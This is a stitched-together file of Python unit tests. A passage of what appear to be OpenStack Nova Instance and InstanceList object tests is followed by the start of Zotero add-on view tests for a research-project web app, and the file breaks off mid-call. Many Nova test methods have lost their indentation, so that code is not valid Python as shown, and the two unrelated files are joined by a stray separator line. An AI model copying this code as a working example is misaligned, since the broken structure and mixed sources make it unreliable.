        self.assertEqual(inst.security_groups.obj_what_changed(), set())
    def test_with_empty_security_groups(self):
        # An empty security_groups list hydrates to an empty object list.
        fake_inst = dict(self.fake_instance, security_groups=[])
        fake_uuid = fake_inst['uuid']
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=['info_cache',
                                                 'security_groups'],
                                use_slave=False
                                ).AndReturn(fake_inst)
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
        self.assertEqual(0, len(inst.security_groups))
    def test_with_empty_pci_devices(self):
        # An empty pci_devices list hydrates to an empty object list.
        fake_inst = dict(self.fake_instance, pci_devices=[])
        fake_uuid = fake_inst['uuid']
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=['pci_devices'],
                                use_slave=False
                                ).AndReturn(fake_inst)
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid,
                                             ['pci_devices'])
        self.assertEqual(len(inst.pci_devices), 0)
    def test_with_pci_devices(self):
        # PCI device rows hydrate into pci_devices objects that keep
        # their instance_uuid association.
        fake_inst = dict(self.fake_instance)
        fake_uuid = fake_inst['uuid']
        fake_inst['pci_devices'] = [
            {'created_at': None,
             'updated_at': None,
             'deleted_at': None,
             'deleted': None,
             'id': 2,
             'compute_node_id': 1,
             'address': 'a1',
             'vendor_id': 'v1',
             'product_id': 'p1',
             'dev_type': 't',
             'status': 'allocated',
             'dev_id': 'i',
             'label': 'l',
             'instance_uuid': fake_uuid,
             'request_id': None,
             'extra_info': '{}'},
            {
             'created_at': None,
             'updated_at': None,
             'deleted_at': None,
             'deleted': None,
             'id': 1,
             'compute_node_id': 1,
             'address': 'a',
             'vendor_id': 'v',
             'product_id': 'p',
             'dev_type': 't',
             'status': 'allocated',
             'dev_id': 'i',
             'label': 'l',
             'instance_uuid': fake_uuid,
             'request_id': None,
             'extra_info': '{}'},
            ]
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=['pci_devices'],
                                use_slave=False
                                ).AndReturn(fake_inst)
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid,
                                             ['pci_devices'])
        self.assertEqual(len(inst.pci_devices), 2)
        self.assertEqual(inst.pci_devices[0].instance_uuid, fake_uuid)
        self.assertEqual(inst.pci_devices[1].instance_uuid, fake_uuid)
    def test_with_fault(self):
        # Requesting the 'fault' attr triggers a fault-table lookup and
        # attaches the first fault found for the instance uuid.
        fake_inst = dict(self.fake_instance)
        fake_uuid = fake_inst['uuid']
        fake_faults = [dict(x, instance_uuid=fake_uuid)
                       for x in test_instance_fault.fake_faults['fake-uuid']]
        self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
        self.mox.StubOutWithMock(db, 'instance_fault_get_by_instance_uuids')
        db.instance_get_by_uuid(self.context, fake_uuid,
                                columns_to_join=[],
                                use_slave=False
                                ).AndReturn(self.fake_instance)
        db.instance_fault_get_by_instance_uuids(
            self.context, [fake_uuid]).AndReturn({fake_uuid: fake_faults})
        self.mox.ReplayAll()
        inst = instance.Instance.get_by_uuid(self.context, fake_uuid,
                                             expected_attrs=['fault'])
        self.assertEqual(fake_faults[0], dict(inst.fault.items()))
        self.assertRemotes()
    def test_iteritems_with_extra_attrs(self):
        # items() must include synthetic attributes (here 'name',
        # stubbed to a constant) alongside real object fields.
        self.stubs.Set(instance.Instance, 'name', 'foo')
        inst = instance.Instance(uuid='fake-uuid')
        self.assertEqual(inst.items(),
                         {'uuid': 'fake-uuid',
                          'name': 'foo',
                          }.items())
def _test_metadata_change_tracking(self, which):
inst = instance.Instance(uuid='fake-uuid')
setattr(inst, which, {})
inst.obj_reset_changes()
getattr(inst, which)['foo'] = 'bar'
self.assertEqual(set([which]), inst.obj_what_changed())
inst.obj_reset_changes()
self.assertEqual(set(), inst.obj_what_changed())
    def test_metadata_change_tracking(self):
        # Exercise in-place change tracking for 'metadata'.
        self._test_metadata_change_tracking('metadata')
    def test_system_metadata_change_tracking(self):
        # Exercise in-place change tracking for 'system_metadata'.
        self._test_metadata_change_tracking('system_metadata')
    def test_create_stubbed(self):
        # create() must pass exactly the set fields to db.instance_create.
        self.mox.StubOutWithMock(db, 'instance_create')
        vals = {'host': 'foo-host',
                'memory_mb': 128,
                'system_metadata': {'foo': 'bar'}}
        fake_inst = fake_instance.fake_db_instance(**vals)
        db.instance_create(self.context, vals).AndReturn(fake_inst)
        self.mox.ReplayAll()
        inst = instance.Instance(host='foo-host', memory_mb=128,
                                 system_metadata={'foo': 'bar'})
        inst.create(self.context)
    def test_create(self):
        # create() with no fields set sends an empty update dict and
        # hydrates the object from the returned DB row.
        self.mox.StubOutWithMock(db, 'instance_create')
        db.instance_create(self.context, {}).AndReturn(self.fake_instance)
        self.mox.ReplayAll()
        inst = instance.Instance()
        inst.create(self.context)
        self.assertEqual(self.fake_instance['id'], inst.id)
def test_create_with_values(self):
inst1 = instance.Instance(user_id=self.context.user_id,
project_id=self.context.project_id,
host='foo-host')
inst1.create(self.context)
self.assertEqual(inst1.host, 'foo-host')
inst2 = instance.Instance.get_by_uuid(self.context, inst1.uuid)
self.assertEqual(inst2.host, 'foo-host')
    def test_create_with_numa_topology(self):
        # A numa_topology supplied at create time is persisted and can
        # be re-fetched by instance uuid afterwards.
        inst = instance.Instance(uuid=self.fake_instance['uuid'],
            numa_topology=instance_numa_topology.InstanceNUMATopology
            .obj_from_topology(
                test_instance_numa_topology.fake_numa_topology))
        inst.create(self.context)
        self.assertIsNotNone(inst.numa_topology)
        got_numa_topo = (
            instance_numa_topology.InstanceNUMATopology
            .get_by_instance_uuid(self.context, inst.uuid))
        self.assertEqual(inst.numa_topology.id, got_numa_topo.id)
def test_recreate_fails(self):
inst = instance.Instance(user_id=self.context.user_id,
project_id=self.context.project_id,
host='foo-host')
inst.create(self.context)
self.assertRaises(exception.ObjectActionError, inst.create,
self.context)
    def test_create_with_special_things(self):
        # Object-valued fields (security_groups, info_cache) must be
        # flattened to primitives before reaching db.instance_create.
        self.mox.StubOutWithMock(db, 'instance_create')
        fake_inst = fake_instance.fake_db_instance()
        db.instance_create(self.context,
                           {'host': 'foo-host',
                            'security_groups': ['foo', 'bar'],
                            'info_cache': {'network_info': '[]'},
                            }
                           ).AndReturn(fake_inst)
        self.mox.ReplayAll()
        secgroups = security_group.SecurityGroupList()
        secgroups.objects = []
        for name in ('foo', 'bar'):
            secgroup = security_group.SecurityGroup()
            secgroup.name = name
            secgroups.objects.append(secgroup)
        info_cache = instance_info_cache.InstanceInfoCache()
        info_cache.network_info = network_model.NetworkInfo()
        inst = instance.Instance(host='foo-host', security_groups=secgroups,
                                 info_cache=info_cache)
        inst.create(self.context)
    def test_destroy_stubbed(self):
        # destroy() must populate deleted_at/deleted from the row that
        # db.instance_destroy returns.
        self.mox.StubOutWithMock(db, 'instance_destroy')
        deleted_at = datetime.datetime(1955, 11, 6)
        fake_inst = fake_instance.fake_db_instance(deleted_at=deleted_at,
                                                   deleted=True)
        db.instance_destroy(self.context, 'fake-uuid',
                            constraint=None).AndReturn(fake_inst)
        self.mox.ReplayAll()
        inst = instance.Instance(id=1, uuid='fake-uuid', host='foo')
        inst.destroy(self.context)
        self.assertEqual(timeutils.normalize_time(inst.deleted_at),
                         timeutils.normalize_time(deleted_at))
        self.assertTrue(inst.deleted)
def test_destroy(self):
values = {'user_id': self.context.user_id,
'project_id': self.context.project_id}
db_inst = db.instance_create(self.context, values)
inst = instance.Instance(id=db_inst['id'], uuid=db_inst['uuid'])
inst.destroy(self.context)
self.assertRaises(exception.InstanceNotFound,
db.instance_get_by_uuid, self.context,
db_inst['uuid'])
def test_destroy_host_constraint(self):
values = {'user_id': self.context.user_id,
'project_id': self.context.project_id,
'host': 'foo'}
db_inst = db.instance_create(self.context, values)
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
inst.host = None
self.assertRaises(exception.ObjectActionError,
inst.destroy)
def test_name_does_not_trigger_lazy_loads(self):
values = {'user_id': self.context.user_id,
'project_id': self.context.project_id,
'host': 'foo'}
db_inst = db.instance_create(self.context, values)
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
self.assertFalse(inst.obj_attr_is_set('fault'))
self.flags(instance_name_template='foo-%(uuid)s')
self.assertEqual('foo-%s' % db_inst['uuid'], inst.name)
self.assertFalse(inst.obj_attr_is_set('fault'))
def test_from_db_object_not_overwrite_info_cache(self):
info_cache = instance_info_cache.InstanceInfoCache()
inst = instance.Instance(context=self.context,
info_cache=info_cache)
db_inst = fake_instance.fake_db_instance()
db_inst['info_cache'] = dict(
test_instance_info_cache.fake_info_cache)
inst._from_db_object(self.context, inst, db_inst,
expected_attrs=['info_cache'])
self.assertIs(info_cache, inst.info_cache)
def test_compat_strings(self):
unicode_attributes = ['user_id', 'project_id', 'image_ref',
'kernel_id', 'ramdisk_id', 'hostname',
'key_name', 'key_data', 'host', 'node',
'user_data', 'availability_zone',
'display_name', 'display_description',
'launched_on', 'locked_by', 'os_type',
'architecture', 'vm_mode', 'root_device_name',
'default_ephemeral_device',
'default_swap_device', 'config_drive',
'cell_name']
inst = instance.Instance()
expected = {}
for key in unicode_attributes:
inst[key] = u'\u2603'
expected[key] = '?'
primitive = inst.obj_to_primitive(target_version='1.6')
self.assertEqual(expected, primitive['nova_object.data'])
self.assertEqual('1.6', primitive['nova_object.version'])
def test_compat_pci_devices(self):
inst = instance.Instance()
inst.pci_devices = pci_device.PciDeviceList()
primitive = inst.obj_to_primitive(target_version='1.5')
self.assertNotIn('pci_devices', primitive)
def test_compat_info_cache(self):
inst = instance.Instance()
inst.info_cache = instance_info_cache.InstanceInfoCache()
primitive = inst.obj_to_primitive(target_version='1.9')
self.assertEqual(
'1.4',
primitive['nova_object.data']['info_cache']['nova_object.version'])
def _test_get_flavor(self, namespace):
prefix = '%s_' % namespace if namespace is not None else ''
db_inst = db.instance_create(self.context, {
'user_id': self.context.user_id,
'project_id': self.context.project_id,
'system_metadata': flavors.save_flavor_info(
{}, flavors.get_default_flavor(), prefix)})
db_flavor = flavors.extract_flavor(db_inst, prefix)
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
flavor = inst.get_flavor(namespace)
self.assertEqual(db_flavor['flavorid'], flavor.flavorid)
    def test_get_flavor(self):
        # Both the un-namespaced and namespaced cases must round-trip.
        self._test_get_flavor(None)
        self._test_get_flavor('foo')
def _test_set_flavor(self, namespace):
prefix = '%s_' % namespace if namespace is not None else ''
db_inst = db.instance_create(self.context, {
'user_id': self.context.user_id,
'project_id': self.context.project_id,
})
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
db_flavor = flavors.get_default_flavor()
inst.set_flavor(db_flavor, namespace)
db_inst = db.instance_get(self.context, db_inst['id'])
self.assertEqual(
db_flavor['flavorid'], flavors.extract_flavor(
db_inst, prefix)['flavorid'])
    def test_set_flavor(self):
        # Both the un-namespaced and namespaced cases must persist.
        self._test_set_flavor(None)
        self._test_set_flavor('foo')
def test_delete_flavor(self):
namespace = 'foo'
prefix = '%s_' % namespace
db_inst = db.instance_create(self.context, {
'user_id': self.context.user_id,
'project_id': self.context.project_id,
'system_metadata': flavors.save_flavor_info(
{}, flavors.get_default_flavor(), prefix)})
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
inst.delete_flavor(namespace)
db_inst = db.instance_get(self.context, db_inst['id'])
self.assertEqual({}, utils.instance_sys_meta(db_inst))
def test_delete_flavor_no_namespace_fails(self):
inst = instance.Instance(system_metadata={})
self.assertRaises(KeyError, inst.delete_flavor, None)
self.assertRaises(KeyError, inst.delete_flavor, '')
@mock.patch.object(db, 'instance_metadata_delete')
def test_delete_metadata_key(self, db_delete):
inst = instance.Instance(context=self.context,
id=1, uuid='fake-uuid')
inst.metadata = {'foo': '1', 'bar': '2'}
inst.obj_reset_changes()
inst.delete_metadata_key('foo')
self.assertEqual({'bar': '2'}, inst.metadata)
self.assertEqual({}, inst.obj_get_changes())
db_delete.assert_called_once_with(self.context, inst.uuid, 'foo')
def test_reset_changes(self):
inst = instance.Instance()
inst.metadata = {'1985': 'present'}
inst.system_metadata = {'1955': 'past'}
self.assertEqual({}, inst._orig_metadata)
inst.obj_reset_changes(['metadata'])
self.assertEqual({'1985': 'present'}, inst._orig_metadata)
self.assertEqual({}, inst._orig_system_metadata)
def test_load_generic_calls_handler(self):
inst = instance.Instance(context=self.context,
uuid='fake-uuid')
with mock.patch.object(inst, '_load_generic') as mock_load:
def fake_load(name):
inst.system_metadata = {}
mock_load.side_effect = fake_load
inst.system_metadata
mock_load.assert_called_once_with('system_metadata')
def test_load_fault_calls_handler(self):
inst = instance.Instance(context=self.context,
uuid='fake-uuid')
with mock.patch.object(inst, '_load_fault') as mock_load:
def fake_load():
inst.fault = None
mock_load.side_effect = fake_load
inst.fault
mock_load.assert_called_once_with()
@mock.patch('nova.objects.Instance.get_by_uuid')
def test_load_generic(self, mock_get):
inst2 = instance.Instance(metadata={'foo': 'bar'})
mock_get.return_value = inst2
inst = instance.Instance(context=self.context,
uuid='fake-uuid')
inst.metadata
self.assertEqual({'foo': 'bar'}, inst.metadata)
mock_get.assert_called_once_with(self.context,
uuid='fake-uuid',
expected_attrs=['metadata'])
self.assertNotIn('metadata', inst.obj_what_changed())
@mock.patch('nova.db.instance_fault_get_by_instance_uuids')
def test_load_fault(self, mock_get):
fake_fault = test_instance_fault.fake_faults['fake-uuid'][0]
mock_get.return_value = {'fake': [fake_fault]}
inst = instance.Instance(context=self.context, uuid='fake')
fault = inst.fault
mock_get.assert_called_once_with(self.context, ['fake'])
self.assertEqual(fake_fault['id'], fault.id)
self.assertNotIn('metadata', inst.obj_what_changed())
class TestInstanceObject(test_objects._LocalTest,
                         _TestInstanceObject):
    # Run _TestInstanceObject against the local (in-process) backend.
    pass
class TestRemoteInstanceObject(test_objects._RemoteTest,
                               _TestInstanceObject):
    # Run _TestInstanceObject over the remote (RPC) object backend.
    pass
class _TestInstanceListObject(object):
    """Tests for InstanceList query helpers, run against local and
    remote backends by the concrete subclasses below.
    """

    def fake_instance(self, id, updates=None):
        """Return a stub DB-style instance dict for list tests.

        :param id: primary key to assign to the stub. (Previously this
                   argument was ignored and every stub was built with a
                   hard-coded id=2, so callers could not create
                   distinguishable instances.)
        :param updates: optional dict of column overrides applied last.
        """
        fake_instance = fakes.stub_instance(id=id,
                                            access_ipv4='1.2.3.4',
                                            access_ipv6='::1')
        fake_instance['scheduled_at'] = None
        fake_instance['terminated_at'] = None
        fake_instance['deleted_at'] = None
        fake_instance['created_at'] = None
        fake_instance['updated_at'] = None
        # launched_at must be tz-aware with no microseconds so it
        # survives the object serialization round trip intact.
        fake_instance['launched_at'] = (
            fake_instance['launched_at'].replace(
                tzinfo=iso8601.iso8601.Utc(), microsecond=0))
        fake_instance['info_cache'] = {'network_info': '[]',
                                       'instance_uuid': fake_instance['uuid']}
        fake_instance['security_groups'] = []
        fake_instance['deleted'] = 0
        if updates:
            fake_instance.update(updates)
        return fake_instance

    def test_get_all_by_filters(self):
        # get_by_filters() passes filters/sort/join args straight to the
        # DB API and hydrates each returned row into an Instance.
        fakes = [self.fake_instance(1), self.fake_instance(2)]
        self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
        db.instance_get_all_by_filters(self.context, {'foo': 'bar'}, 'uuid',
                                       'asc', limit=None, marker=None,
                                       columns_to_join=['metadata'],
                                       use_slave=False).AndReturn(fakes)
        self.mox.ReplayAll()
        inst_list = instance.InstanceList.get_by_filters(
            self.context, {'foo': 'bar'}, 'uuid', 'asc',
            expected_attrs=['metadata'], use_slave=False)
        for i in range(0, len(fakes)):
            self.assertIsInstance(inst_list.objects[i], instance.Instance)
            self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
        self.assertRemotes()

    def test_get_all_by_filters_works_for_cleaned(self):
        # 'deleted'/'cleaned' filters are forwarded and only the rows
        # the DB stub returns come back in the list.
        fakes = [self.fake_instance(1),
                 self.fake_instance(2, updates={'deleted': 2,
                                                'cleaned': None})]
        self.context.read_deleted = 'yes'
        self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
        db.instance_get_all_by_filters(self.context,
                                       {'deleted': True, 'cleaned': False},
                                       'uuid', 'asc', limit=None, marker=None,
                                       columns_to_join=['metadata'],
                                       use_slave=False).AndReturn(
                                           [fakes[1]])
        self.mox.ReplayAll()
        inst_list = instance.InstanceList.get_by_filters(
            self.context, {'deleted': True, 'cleaned': False}, 'uuid', 'asc',
            expected_attrs=['metadata'], use_slave=False)
        self.assertEqual(1, len(inst_list))
        self.assertIsInstance(inst_list.objects[0], instance.Instance)
        self.assertEqual(inst_list.objects[0].uuid, fakes[1]['uuid'])
        self.assertRemotes()

    def test_get_by_host(self):
        # get_by_host() hydrates rows, attaches the calling context to
        # each object, and leaves nothing marked changed.
        fakes = [self.fake_instance(1),
                 self.fake_instance(2)]
        self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
        db.instance_get_all_by_host(self.context, 'foo',
                                    columns_to_join=None,
                                    use_slave=False).AndReturn(fakes)
        self.mox.ReplayAll()
        inst_list = instance.InstanceList.get_by_host(self.context, 'foo')
        for i in range(0, len(fakes)):
            self.assertIsInstance(inst_list.objects[i], instance.Instance)
            self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
            self.assertEqual(inst_list.objects[i]._context, self.context)
        self.assertEqual(inst_list.obj_what_changed(), set())
        self.assertRemotes()

    def test_get_by_host_and_node(self):
        # host+node lookup is forwarded positionally to the DB API.
        fakes = [self.fake_instance(1),
                 self.fake_instance(2)]
        self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
        db.instance_get_all_by_host_and_node(self.context, 'foo', 'bar'
                                             ).AndReturn(fakes)
        self.mox.ReplayAll()
        inst_list = instance.InstanceList.get_by_host_and_node(self.context,
                                                               'foo', 'bar')
        for i in range(0, len(fakes)):
            self.assertIsInstance(inst_list.objects[i], instance.Instance)
            self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
        self.assertRemotes()

    def test_get_by_host_and_not_type(self):
        # The type exclusion is passed as the type_id keyword.
        fakes = [self.fake_instance(1),
                 self.fake_instance(2)]
        self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_not_type')
        db.instance_get_all_by_host_and_not_type(self.context, 'foo',
                                                 type_id='bar').AndReturn(
                                                     fakes)
        self.mox.ReplayAll()
        inst_list = instance.InstanceList.get_by_host_and_not_type(
            self.context, 'foo', 'bar')
        for i in range(0, len(fakes)):
            self.assertIsInstance(inst_list.objects[i], instance.Instance)
            self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
        self.assertRemotes()

    def test_get_hung_in_rebooting(self):
        # The reboot window timestamp is forwarded to the DB API.
        fakes = [self.fake_instance(1),
                 self.fake_instance(2)]
        dt = timeutils.isotime()
        self.mox.StubOutWithMock(db, 'instance_get_all_hung_in_rebooting')
        db.instance_get_all_hung_in_rebooting(self.context, dt).AndReturn(
            fakes)
        self.mox.ReplayAll()
        inst_list = instance.InstanceList.get_hung_in_rebooting(self.context,
                                                                dt)
        for i in range(0, len(fakes)):
            self.assertIsInstance(inst_list.objects[i], instance.Instance)
            self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
        self.assertRemotes()

    def test_get_active_by_window_joined(self):
        fakes = [self.fake_instance(1), self.fake_instance(2)]
        # NOTE(mriedem): Send in a timezone-naive datetime since the
        # InstanceList.get_active_by_window_joined method should convert it
        # to tz-aware for the DB API call, which we'll assert with our stub.
        dt = timeutils.utcnow()

        def fake_instance_get_active_by_window_joined(context, begin, end,
                                                      project_id, host):
            # make sure begin is tz-aware
            self.assertIsNotNone(begin.utcoffset())
            self.assertIsNone(end)
            return fakes

        with mock.patch.object(db, 'instance_get_active_by_window_joined',
                               fake_instance_get_active_by_window_joined):
            inst_list = instance.InstanceList.get_active_by_window_joined(
                self.context, dt)
        for fake, obj in zip(fakes, inst_list.objects):
            self.assertIsInstance(obj, instance.Instance)
            self.assertEqual(obj.uuid, fake['uuid'])
        self.assertRemotes()

    def test_with_fault(self):
        # Instances with no matching fault entry get fault=None; the
        # first instance picks up its most recent fault dict.
        fake_insts = [
            fake_instance.fake_db_instance(uuid='fake-uuid', host='host'),
            fake_instance.fake_db_instance(uuid='fake-inst2', host='host'),
            ]
        fake_faults = test_instance_fault.fake_faults
        self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
        self.mox.StubOutWithMock(db, 'instance_fault_get_by_instance_uuids')
        db.instance_get_all_by_host(self.context, 'host',
                                    columns_to_join=[],
                                    use_slave=False
                                    ).AndReturn(fake_insts)
        db.instance_fault_get_by_instance_uuids(
            self.context, [x['uuid'] for x in fake_insts]
            ).AndReturn(fake_faults)
        self.mox.ReplayAll()
        instances = instance.InstanceList.get_by_host(self.context, 'host',
                                                      expected_attrs=['fault'],
                                                      use_slave=False)
        self.assertEqual(2, len(instances))
        self.assertEqual(fake_faults['fake-uuid'][0],
                         dict(instances[0].fault.iteritems()))
        self.assertIsNone(instances[1].fault)

    def test_fill_faults(self):
        # fill_faults() attaches the newest fault to each instance,
        # returns the uuids that had one, and dirties nothing.
        self.mox.StubOutWithMock(db, 'instance_fault_get_by_instance_uuids')
        inst1 = instance.Instance(uuid='uuid1')
        inst2 = instance.Instance(uuid='uuid2')
        insts = [inst1, inst2]
        for inst in insts:
            inst.obj_reset_changes()
        db_faults = {
            'uuid1': [{'id': 123,
                       'instance_uuid': 'uuid1',
                       'code': 456,
                       'message': 'Fake message',
                       'details': 'No details',
                       'host': 'foo',
                       'deleted': False,
                       'deleted_at': None,
                       'updated_at': None,
                       'created_at': None,
                       }
                      ]}
        db.instance_fault_get_by_instance_uuids(self.context,
                                                [x.uuid for x in insts],
                                                ).AndReturn(db_faults)
        self.mox.ReplayAll()
        inst_list = instance.InstanceList()
        inst_list._context = self.context
        inst_list.objects = insts
        faulty = inst_list.fill_faults()
        self.assertEqual(faulty, ['uuid1'])
        self.assertEqual(inst_list[0].fault.message,
                         db_faults['uuid1'][0]['message'])
        self.assertIsNone(inst_list[1].fault)
        for inst in inst_list:
            self.assertEqual(inst.obj_what_changed(), set())

    def test_get_by_security_group(self):
        # The security group's joined 'instances' rows hydrate into a
        # full InstanceList, including joined system_metadata.
        fake_secgroup = dict(test_security_group.fake_secgroup)
        fake_secgroup['instances'] = [
            fake_instance.fake_db_instance(id=1,
                                           system_metadata={'foo': 'bar'}),
            fake_instance.fake_db_instance(id=2),
            ]
        with mock.patch.object(db, 'security_group_get') as sgg:
            sgg.return_value = fake_secgroup
            secgroup = security_group.SecurityGroup()
            secgroup.id = fake_secgroup['id']
            instances = instance.InstanceList.get_by_security_group(
                self.context, secgroup)
        self.assertEqual(2, len(instances))
        self.assertEqual([1, 2], [x.id for x in instances])
        self.assertTrue(instances[0].obj_attr_is_set('system_metadata'))
        self.assertEqual({'foo': 'bar'}, instances[0].system_metadata)
class TestInstanceListObject(test_objects._LocalTest,
                             _TestInstanceListObject):
    # Run _TestInstanceListObject against the local backend.
    pass
class TestRemoteInstanceListObject(test_objects._RemoteTest,
                                   _TestInstanceListObject):
    # Run _TestInstanceListObject over the remote (RPC) backend.
    pass
class TestInstanceObjectMisc(test.NoDBTestCase):
    def test_expected_cols(self):
        # _expected_cols() keeps only attrs that are DB-joined columns
        # and passes None through unchanged.
        self.stubs.Set(instance, '_INSTANCE_OPTIONAL_JOINED_FIELDS', ['bar'])
        self.assertEqual(['bar'], instance._expected_cols(['foo', 'bar']))
        self.assertIsNone(instance._expected_cols(None))
| |
# -*- coding: utf-8 -*-
import urlparse

import mock
import responses
from nose.tools import *  # noqa

from framework.auth.core import Auth

from tests.base import OsfTestCase
from tests.factories import AuthUserFactory, ProjectFactory

from website.addons.zotero import views
from website.addons.zotero.tests.factories import (
    ZoteroAccountFactory,
    ZoteroUserSettingsFactory,
    ZoteroNodeSettingsFactory
)

from utils import mock_responses
API_URL = 'https://api.zotero.org'
class MockNode(object):
    """Minimal stand-in for a project node used in view tests."""

    addon = None

    @property
    def is_deleted(self):
        # Mock nodes are never deleted.
        return False

    @property
    def is_public(self):
        # Mock nodes are always public.
        return True

    def get_addon(self, name):
        # Only the zotero addon is wired up on this mock.
        return self.addon if name == 'zotero' else None
class ZoteroViewsTestCase(OsfTestCase):
def setUp(self):
super(ZoteroViewsTestCase, self).setUp()
self.account = ZoteroAccountFactory()
self.user = AuthUserFactory(external_accounts=[self.account])
self.account.display_name = self.user.fullname
self.account.save()
self.user_addon = ZoteroUserSettingsFactory(owner=self.user, external_account=self.account)
self.project = ProjectFactory(creator=self.user)
self.node_addon = ZoteroNodeSettingsFactory(owner=self.project)
self.node_addon.set_auth(external_account=self.account, user=self.user)
#self.user_addon.grant_oauth_access(self.node_addon, self.account, metadata={'lists': 'list'})
self.node = MockNode()
self.node.addon = self.node_addon
self.id_patcher = mock.patch('website.addons.zotero.model.Zotero.client_id')
self.secret_patcher = mock.patch('website.addons.zotero.model.Zotero.client_secret')
self.id_patcher.__get__ = mock.Mock(return_value='1234567890asdf')
self.secret_patcher.__get__ = mock.Mock(return_value='1234567890asdf')
self.id_patcher.start()
self.secret_patcher.start()
def tearDown(self):
self.id_patcher.stop()
self.secret_patcher.stop()
def test_serialize_settings_authorizer(self):
#"""dict: a serialized version of user-specific addon settings"""
res = self.app.get(
self.project.api_url_for('zotero_get_config'),
auth=self.user.auth,
)
assert_true(res.json['nodeHasAuth'])
assert_true(res.json['userHasAuth'])
assert_true(res.json['userIsOwner'])
assert_equal(res.json['folder'], '')
assert_equal(res.json['ownerName'], self.user.fullname)
assert_true(res.json['urls']['auth'])
assert_true(res.json['urls']['config'])
assert_true(res.json['urls']['deauthorize'])
assert_true(res.json['urls']['folders'])
assert_true(res.json['urls']['importAuth'])
assert_true(res.json['urls']['settings'])
def test_serialize_settings_non_authorizer(self):
#"""dict: a serialized version of user-specific addon settings"""
non_authorizing_user = AuthUserFactory()
self.project.add_contributor(non_authorizing_user, save=True)
res = self.app.get(
self.project.api_url_for('zotero_get_config'),
auth=non_authorizing_user.auth,
)
assert_true(res.json['nodeHasAuth'])
assert_false(res.json['userHasAuth'])
assert_false(res.json['userIsOwner'])
assert_equal(res.json['folder'], '')
assert_equal(res.json['ownerName'], self.user.fullname)
assert_true(res.json['urls']['auth'])
assert_true(res.json['urls']['config'])
assert_true(res.json['urls']['deauthorize'])
assert_true(res.json['urls']['folders'])
assert_true(res.json['urls']['importAuth'])
assert_true(res.json['urls']['settings'])
def test_set_auth(self):
res = self.app.post_json(
self.project.api_url_for('zotero_add_user_auth'),
{
'external_account_id': self.account._id,
},
auth=self.user.auth,
)
assert_equal(
res.status_code,
200
)
assert_true(res.json['result']['userHasAuth'])
assert_equal(
self.node_addon.user_settings,
self.user_addon
)
assert_equal(
self.node_addon.external_account,
self.account
)
def test_remove_user_auth(self):
self.node_addon.set_auth(self.account, self.user)
self.node_addon.save()
res = self.app.delete_json(
self.project.api_url_for('zotero_remove_user_auth'),
{
'external_account_id': self.account._id,
},
auth=self.user.auth,
)
assert_equal(
res.status_code,
200
)
self.node_addon.reload()
assert_is_none(self.node_addon.user_settings)
assert_is_none(self.node_addon.external_account)
def test_set_config_owner(self):
# Settings config updates node settings
self.node_addon.associated_user_settings = []
self.node_addon.save()
res = self.app.put_json(
self.project.api_url_for('zotero_set_config'),
{
'external_account_id': self.account._id,
'external_list_id': 'list',
},
auth=self.user.auth,
)
self.node_addon.reload()
assert_equal(self.user_addon, self.node_addon.user_settings)
assert_equal(res.json, {})
def test_set_config_not_owner(self):
user = AuthUserFactory()
user.add_addon('zotero')
self.project.add_contributor(user)
self.project.save()
res = self.app.put_json(
self.project.api_url_for('zotero_set_config'),
{
'external_account_id': self.account._id,
'external_list_id': 'list',
},
auth=user.auth,
)
self.node_addon.reload()
assert_equal(self.user_addon, self.node_addon.user_settings)
assert_equal(res.json, {})
def test_zotero_widget_view_complete(self):
# JSON: everything a widget needs
assert_false(self.node_addon.complete)
assert_equal(self.node_addon.zotero_list_id, None)
self.node_addon.set_target_folder('ROOT-ID', 'ROOT', auth=Auth(user=self.user))
res = views.zotero_widget(node_addon=self.node_addon,
project=self.project,
node=self.node,
nid=self.node_addon._id,
pid=self.project._id,
auth=self.user.auth)
assert_true(res['complete'])
assert_equal(res['list_id'], 'ROOT-ID')
def test_widget_view_incomplete(self):
# JSON: tell the widget when it hasn't been configured
assert_false(self.node_addon.complete)
assert_equal(self.node_addon.zotero_list_id, None)
res = views.zotero_widget(node_addon=self.node_addon,
project=self.project,
node=self.node,
nid=self.node_addon._id,
pid=self.project._id,
auth=self.user.auth)
assert_false(res['complete'])
assert_is_none(res['list_id'])
@responses.activate
def test_zotero_citation_list_root(self):
responses.add(
responses.GET,
urlparse.urljoin(
API_URL,
'users/{}/collections'.format(self.account.provider_id)
),
body=mock_responses['folders'],
content_type='application/json'
)
res = self.app.get(
self.project.api_url_for('zotero_citation_list'),
auth=self.user.auth
)
root = res.json['contents'][0]
assert_equal(root['kind'], 'folder')
assert_equal(root['id'], 'ROOT')
assert_equal(root['parent_list_id'], '__')
    @responses.activate
    def test_zotero_citation_list_non_root(self):
        # Mock both Zotero endpoints the view hits when expanding a folder:
        # first the collections listing (sub-folders)...
        responses.add(
            responses.GET,
            urlparse.urljoin(
                API_URL,
                'users/{}/collections'.format(self.account.provider_id)
            ),
            body=mock_responses['folders'],
            content_type='application/json'
        )
        # ...then the items listing (documents inside the folder).
        responses.add(
            responses.GET,
